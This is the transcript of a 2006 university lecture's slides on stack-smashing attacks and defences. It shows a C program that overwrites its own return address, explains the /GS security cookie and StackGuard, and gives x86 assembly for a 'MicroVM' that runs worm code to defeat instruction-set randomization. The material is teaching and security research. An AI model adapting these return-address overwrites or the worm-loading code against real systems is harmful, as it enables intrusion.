Presentation is loading. Please wait.

Presentation is loading. Please wait.

CS216: Program and Data Representation University of Virginia Computer Science Spring 2006 David Evans Lecture 22: Unconventional.

Published byStella Park Modified over 8 years ago

Similar presentations

Presentation on theme: "CS216: Program and Data Representation University of Virginia Computer Science Spring 2006 David Evans Lecture 22: Unconventional."— Presentation transcript:

1 CS216: Program and Data Representation University of Virginia Computer Science Spring 2006 David Evans http://www.cs.virginia.edu/cs216 Lecture 22: Unconventional Calling

2 2 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling Menu Stack Smashing Attacks and Defenses ISR De-Randomizing MicroVM

3 3 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling parameter 3 parameter 2 parameter 1 return address saved EBP local variable 1 local variable 2 local variable 3 saved EDI saved ESI Higher Addresses Stack Growth EBP ESP [ebp]+8 [ebp]+12 [ebp]+16 [ebp]-4

4 4 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling Pathological C Program void pathological () { char a[4] = "abcd"; char *adr; int val; val = 8; /* Saved EBP */ /* return address <- location of a[16] */ a[val+4] = 0xe4; a[val+5] = 0xfe; a[val+6] = 0x12; a[val+7] = 0x00; /* a[16-17] <- JMP -2 */ a[val+8] = 0xeb; a[val+9] = 0xfe; a[val+10] = 0x00; a[val+11] = 0x00; } int main (int argc, char **argv) { pathological (); printf ("Hello\n"); return EXIT_SUCCESS; }

5 5 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling

6 6 a[0] return address

7 7 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling a[0] void pathological () { char a[4] = "abcd"; char *adr; int val; val = 8; a[val+4] = 0xe4; a[val+5] = 0xfe; a[val+6] = 0x12; a[val+7] = 0x00; /* a[16-17] <- JMP -2 */ a[val+8] = 0xeb; a[val+9] = 0xfe; a[val+10] = 0x00; a[val+11] = 0x00; }

8 8 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling 0040107D mov edx,dword ptr [val] 00401080 mov byte ptr [ebp+edx+3],0 } 00401085 mov esp,ebp 00401087 pop ebp 00401088 ret 0012FEE4 jmp 0012FEE4

9 9 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling /GS

10 10 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling /GS Option The compiler injects checks in functions with local string buffers or, on x86, functions with exception handling. A string buffer is defined as an array whose element size is one or two bytes, and where the size of the whole array is at least five bytes, or, any buffer allocated with _alloca._alloca http://msdn2.microsoft.com/en-US/library/8dbf701c(VS.80).aspx

11 11 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling With /GS void pathological () { char a[5] = "abcd";

12 12 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling Security Cookies void pathological () { 00401030 push ebp 00401031 mov ebp,esp 00401033 sub esp,14h 00401036 mov eax,dword ptr [___security_cookie (408060h)] 0040103B mov dword ptr [ebp-8],eax... 0040109B mov eax,dword ptr [val] 0040109E mov byte ptr [ebp+eax-5],0 } 004010A3 mov ecx,dword ptr [ebp-8] 004010A6 call __security_check_cookie (40111Eh) 004010AB mov esp,ebp 004010AD pop ebp 004010AE ret

13 13 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling ebp cookie return address StackGuard implementation ebp canary return address

14 14 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling Cookie Checking void __declspec(naked) __fastcall __security_check_cookie(DWORD_PTR cookie) { /* x86 version written in asm to preserve all regs */ __asm { cmp ecx, __security_cookie 0040111E cmp ecx,dword ptr [___security_cookie (408060h)] jne failure 00401124 jne failure (401127h) ret 00401126 ret failure: jmp report_failure 00401127 jmp report_failure (4010EDh)

15 15 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling Does it work? void pathological () { char a[5] = "abcd"; char *adr; int val; printf ("Hello\n"); val = 16; /* return address <- location of a[16] */ a[val+4] = 0xe4; a[val+5] = 0xfe; a[val+6] = 0x12; a[val+7] = 0x00; /* a[16-17] = JMP -2 */ a[val+8] = 0xeb; a[val+9] = 0xfe; a[val+10] = 0x00; a[val+11] = 0x00; }

16 16 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling Works in Practice? Most attacks can’t skip over cookie –Must fill up buffer, instead of directly assigning to locations Lots and lots of other proposed defenses

17 17 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling An Instruction Set Randomizing MicroVM

18 18 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling save worm address in ebp move stack frame pointer WormIP  0 copy worm code into buffer update WormIP save MicroVM registers load worm registers 22-byte worm execution buffer save worm registers load MicroVM registers jmp to read next block saved registers worm code host key masks guessed (target) masks other worm data Learned Key Bytes 76 bytes of code + 22 bytes for execution + 2 bytes to avoid NULL = 100 bytes is enough > 99% of the time MicroVM Worm code must be coded in blocks that fit into execution buffer (pad with noops so instructions do not cross block boundaries)

19 19 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling MicroVM Code push dword ebpmov ebp, WORM_ADDRESS + WORM_REG_OFFSET pop dword [ebp + WORM_DATA_OFFSET] xor eax, eax ; WormIP = 0 (load from ebp + eax) read_more_worm: ; read NUM_BYTES at a time until worm is done cld xor ecx, ecx mov byte cl, NUM_BYTES mov dword esi, WORM_ADDRESS ; get saved WormIP add dword esi, eax mov edi, begin_worm_exec rep movsb; copies next Worm block into execution buffer add eax, NUM_BYTES ; change WormIP pushad ; save register vals mov edi, dword [ebp] ; restore worm registers mov esi, dword [ebp + ESI_OFFSET] mov ebx, dword [ebp + EBX_OFFSET] mov edx, dword [ebp + EDX_OFFSET] mov ecx, dword [ebp + ECX_OFFSET] mov eax, dword [ebp + EAX_OFFSET] begin_worm_exec: ; this is the worm execution buffer nop nop nop nop nop nop nop nop nop nop nop nop mov [ebp], edi; save worm registers mov [ebp + ESI_OFFSET], esi mov [ebp + EBX_OFFSET], ebx mov [ebp + EDX_OFFSET], edx mov [ebp + ECX_OFFSET], ecx mov [ebp + EAX_OFFSET], eax popad ; restore microVM register vals jmp read_more_worm Note: this is nasm x86 assembly code, not masm, so some directives are slightly different

20 20 UVa CS216 Spring 2006 - Lecture 22: Unconventional Calling Charge PS7 Due Wednesday –Lots of interesting things to explore Exam 2 will be posted Thursday Next class: review (if you send questions) “x86 Guru” title(s) may be awarded for especially clever answers to Question 10

Download ppt "CS216: Program and Data Representation University of Virginia Computer Science Spring 2006 David Evans Lecture 22: Unconventional."

Similar presentations

Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Machine/Assembler Language Putting It All Together Noah Mendelsohn Tufts University Web:

Machine/Assembler Language Putting It All Together Noah Mendelsohn Tufts University Web:
C Programming and Assembly Language Janakiraman V – NITK Surathkal 2 nd August 2014.

C Programming and Assembly Language Janakiraman V – NITK Surathkal 2 nd August 2014.
Assembly Language for Intel-Based Computers Chapter 8: Advanced Procedures Kip R. Irvine.

Assembly Language for Intel-Based Computers Chapter 8: Advanced Procedures Kip R. Irvine.
University of Washington Last Time For loops  for loop → while loop → do-while loop → goto version  for loop → while loop → goto “jump to middle” version.

University of Washington Last Time For loops  for loop → while loop → do-while loop → goto version  for loop → while loop → goto “jump to middle” version.
Assembly Language for Intel-Based Computers Chapter 5: Procedures Kip R. Irvine.

Assembly Language for Intel-Based Computers Chapter 5: Procedures Kip R. Irvine.
1 Lecture 5: Procedures Assembly Language for Intel-Based Computers, 4th edition Kip R. Irvine.

1 Lecture 5: Procedures Assembly Language for Intel-Based Computers, 4th edition Kip R. Irvine.
Practical Session 3. The Stack The stack is an area in memory that its purpose is to provide a space for temporary storage of addresses and data items.

Practical Session 3. The Stack The stack is an area in memory that its purpose is to provide a space for temporary storage of addresses and data items.
Windows XP SP2 Stack Protection Jimmy Hermansson Johan Tibell.

Windows XP SP2 Stack Protection Jimmy Hermansson Johan Tibell.
Accessing parameters from the stack and calling functions.

Accessing parameters from the stack and calling functions.
Practical Session 3. The Stack The stack is an area in memory that its purpose is to provide a space for temporary storage of addresses and data items.

Practical Session 3. The Stack The stack is an area in memory that its purpose is to provide a space for temporary storage of addresses and data items.
1 Homework Reading –PAL, pp 201-216, 297-312 Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.

1 Homework Reading –PAL, pp , Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.
CS2422 Assembly Language and System Programming High-Level Language Interface Department of Computer Science National Tsing Hua University.

CS2422 Assembly Language and System Programming High-Level Language Interface Department of Computer Science National Tsing Hua University.
David Evans CS201j: Engineering Software University of Virginia Computer Science Lecture 18: 0xCAFEBABE (Java Byte Codes)

David Evans CS201j: Engineering Software University of Virginia Computer Science Lecture 18: 0xCAFEBABE (Java Byte Codes)
Computer Architecture and Operating Systems CS 3230 :Assembly Section Lecture 7 Department of Computer Science and Software Engineering University of Wisconsin-Platteville.

Computer Architecture and Operating Systems CS 3230 :Assembly Section Lecture 7 Department of Computer Science and Software Engineering University of Wisconsin-Platteville.
Today’s topics Parameter passing on the system stack Parameter passing on the system stack Register indirect and base-indexed addressing modes Register.

Today’s topics Parameter passing on the system stack Parameter passing on the system stack Register indirect and base-indexed addressing modes Register.
University of Washington Today More on procedures, stack etc. Lab 2 due today!  We hope it was fun! What is a stack?  And how about a stack frame? 1.

University of Washington Today More on procedures, stack etc. Lab 2 due today!  We hope it was fun! What is a stack?  And how about a stack frame? 1.
Code Generation Gülfem Savrun Yeniçeri CS 142 (b) 02/26/2013.

Code Generation Gülfem Savrun Yeniçeri CS 142 (b) 02/26/2013.
Practical Session 4. Labels Definition - advanced label: (pseudo) instruction operands ; comment valid characters in labels are: letters, numbers, _,

Practical Session 4. Labels Definition - advanced label: (pseudo) instruction operands ; comment valid characters in labels are: letters, numbers, _,
Assembly Language for Intel-Based Computers, 6 th Edition Chapter 8: Advanced Procedures (c) Pearson Education, 2010-2011. All rights reserved. You may.

Assembly Language for Intel-Based Computers, 6 th Edition Chapter 8: Advanced Procedures (c) Pearson Education, All rights reserved. You may.

Similar presentations

Ads by Google